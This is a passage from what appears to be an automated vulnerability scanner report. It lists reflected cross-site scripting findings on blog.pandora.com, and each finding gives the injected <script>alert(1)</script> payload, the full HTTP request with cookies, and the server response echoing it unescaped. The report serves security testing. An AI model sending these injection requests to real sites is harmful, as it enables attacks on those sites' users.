Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6552d<script>alert(1)</script>a04c546c7c1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005/076552d<script>alert(1)</script>a04c546c7c1/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/076552d<script>alert(1)</script>a04c546c7c1/ was not found on this server.</p>
...[SNIP]...

1.11. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/08/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1adf9<script>alert(1)</script>84f161db5a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora1adf9<script>alert(1)</script>84f161db5a2/archives/2005/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora1adf9<script>alert(1)</script>84f161db5a2/archives/2005/08/ was not found on this server.</p>
...[SNIP]...

1.12. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/08/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 55147<script>alert(1)</script>0105bf04052 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives55147<script>alert(1)</script>0105bf04052/2005/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives55147<script>alert(1)</script>0105bf04052/2005/08/ was not found on this server.</p>
...[SNIP]...

1.13. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/08/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 79994<script>alert(1)</script>e7a8e90b39f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200579994<script>alert(1)</script>e7a8e90b39f/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200579994<script>alert(1)</script>e7a8e90b39f/08/ was not found on this server.</p>
...[SNIP]...

1.14. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/08/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8db7f<script>alert(1)</script>1733790e5e0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005/088db7f<script>alert(1)</script>1733790e5e0/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/088db7f<script>alert(1)</script>1733790e5e0/ was not found on this server.</p>
...[SNIP]...

1.15. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/09/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b3b98<script>alert(1)</script>f3dc42bdead was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorab3b98<script>alert(1)</script>f3dc42bdead/archives/2005/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorab3b98<script>alert(1)</script>f3dc42bdead/archives/2005/09/ was not found on this server.</p>
...[SNIP]...

1.16. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/09/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9f14e<script>alert(1)</script>8a7f5560974 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives9f14e<script>alert(1)</script>8a7f5560974/2005/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives9f14e<script>alert(1)</script>8a7f5560974/2005/09/ was not found on this server.</p>
...[SNIP]...

1.17. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/09/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 85944<script>alert(1)</script>d8b652c75fe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200585944<script>alert(1)</script>d8b652c75fe/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200585944<script>alert(1)</script>d8b652c75fe/09/ was not found on this server.</p>
...[SNIP]...

1.18. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/09/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b19b6<script>alert(1)</script>a2e5dc60e78 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005/09b19b6<script>alert(1)</script>a2e5dc60e78/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/09b19b6<script>alert(1)</script>a2e5dc60e78/ was not found on this server.</p>
...[SNIP]...

1.19. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73e85<script>alert(1)</script>ab709179510 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora73e85<script>alert(1)</script>ab709179510/archives/2005/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora73e85<script>alert(1)</script>ab709179510/archives/2005/11/ was not found on this server.</p>
...[SNIP]...

1.20. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 52080<script>alert(1)</script>69601ecbd83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives52080<script>alert(1)</script>69601ecbd83/2005/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives52080<script>alert(1)</script>69601ecbd83/2005/11/ was not found on this server.</p>
...[SNIP]...

1.21. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/11/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f1a55<script>alert(1)</script>2930f5de171 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005f1a55<script>alert(1)</script>2930f5de171/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005f1a55<script>alert(1)</script>2930f5de171/11/ was not found on this server.</p>
...[SNIP]...

1.22. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/11/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f891c<script>alert(1)</script>910256c07c6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005/11f891c<script>alert(1)</script>910256c07c6/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/11f891c<script>alert(1)</script>910256c07c6/ was not found on this server.</p>
...[SNIP]...

1.23. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 812a3<script>alert(1)</script>4963365f5f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora812a3<script>alert(1)</script>4963365f5f1/archives/2005/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora812a3<script>alert(1)</script>4963365f5f1/archives/2005/12/ was not found on this server.</p>
...[SNIP]...

1.24. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bb8f3<script>alert(1)</script>2960d34c74e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesbb8f3<script>alert(1)</script>2960d34c74e/2005/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbb8f3<script>alert(1)</script>2960d34c74e/2005/12/ was not found on this server.</p>
...[SNIP]...

1.25. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97499<script>alert(1)</script>74af091ba5d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200597499<script>alert(1)</script>74af091ba5d/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200597499<script>alert(1)</script>74af091ba5d/12/ was not found on this server.</p>
...[SNIP]...

1.26. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d6250<script>alert(1)</script>f5b95efae30 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005/12d6250<script>alert(1)</script>f5b95efae30/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/12d6250<script>alert(1)</script>f5b95efae30/ was not found on this server.</p>
...[SNIP]...

1.27. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/01/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 176cf<script>alert(1)</script>b4e0ebb55d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

